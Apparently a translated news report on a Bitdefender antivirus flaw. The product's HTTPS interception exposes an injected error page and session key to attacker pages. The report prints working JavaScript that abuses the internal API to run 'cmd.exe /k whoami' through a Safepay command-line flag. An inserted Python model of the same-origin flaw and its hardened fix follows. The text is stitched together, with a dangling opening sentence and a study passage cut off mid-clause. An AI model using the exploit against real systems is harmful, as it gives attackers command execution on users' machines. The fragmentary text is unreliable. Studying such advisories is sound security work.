Vladimir Palant, creator of Adblock Plus,
The root cause is that Bitdefender antivirus intercepts HTTPS traffic locally by replacing the site's original TLS certificate with its own. An additional root certificate is installed on the client system so that the interception stays invisible to the user and the browser. The antivirus inserts itself into the encrypted traffic and injects its own JavaScript code into some pages to implement the Safe Search feature; when there is a problem with the site's certificate, it replaces the browser's error page with its own. Because that substituted error page is served as if it came from the site being opened, other pages on that same origin have full access to the content inserted by Bitdefender.
When an attacker-controlled site is opened, that site can send an XMLHttpRequest that provokes an HTTPS certificate error, so the response is the error page substituted by Bitdefender. Since the error page is delivered within the context of the attacker's domain, the attacker's script can read the contents of the substituted Bitdefender settings page. The page substituted by Bitdefender also contains a session key that allows the internal Bitdefender API to be used to launch a separate Safepay browser session with arbitrary command line flags, and thus to run arbitrary system commands via the --utility-cmd-prefix flag. Exploit example (param1 and param2 are the values obtained from the error page):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
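The design flaw described above, as an added illustration that is not part of the original article or of Bitdefender's code: a small model of a local TLS interceptor and a browser enforcing the same-origin policy. In the vulnerable design the error page is attributed to the requested site's origin and carries a session key; in the hardened design it is served from a dedicated interceptor origin (the hostname interstitial.invalid, the SESSION_KEY value and the cert_is_valid() rule are all constructed assumptions) and carries no capability token.

```python
"""Why an injected TLS error page must not share the requested site's origin."""
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class Response:
    origin: str   # the origin the browser attributes the body to
    body: str


INTERCEPTOR_ORIGIN = "https://interstitial.invalid"   # assumed dedicated origin
SESSION_KEY = "SESSION-KEY-PLACEHOLDER"                # constructed value


def origin_of(url: str) -> str:
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}"


def cert_is_valid(host: str) -> bool:
    # Constructed rule: only this host presents a certificate the proxy accepts.
    return host == "bank.example"


def interceptor_fetch(url: str, hardened: bool) -> Response:
    """Vulnerable: the error page is rendered as if the site sent it, key embedded.
    Hardened: the page comes from the interceptor's own origin and has no secrets."""
    host = urlparse(url).hostname or ""
    if cert_is_valid(host):
        return Response(origin_of(url), "<html>real content</html>")
    if not hardened:
        return Response(origin_of(url), f"<html>Certificate error. key={SESSION_KEY}</html>")
    return Response(INTERCEPTOR_ORIGIN, "<html>Certificate error (no secrets here).</html>")


def xhr_readable_body(page_url: str, target_url: str, hardened: bool):
    """Script on page_url may read the body only when the origins match."""
    resp = interceptor_fetch(target_url, hardened)
    return resp.body if resp.origin == origin_of(page_url) else None


def key_leaks_to(page_url: str, hardened: bool) -> bool:
    """Can a page on page_url read the session key by forcing a cert error?"""
    body = xhr_readable_body(page_url, page_url + "/anything", hardened)
    return body is not None and SESSION_KEY in body


if __name__ == "__main__":
    print("vulnerable leaks key:", key_leaks_to("https://attacker.example", False))
    print("hardened leaks key: ", key_leaks_to("https://attacker.example", True))
```

The model shows the mitigation a practitioner would check for in any interception product: interstitial content must live on an origin the interceptor controls, and must not embed tokens that grant API access.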
Please note that a 2017 study
Only 11 out of 26 products offered up-to-date cipher suites. Five systems did not perform certificate verification at all (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security and Total Security products were attacked
Source: opennet.ru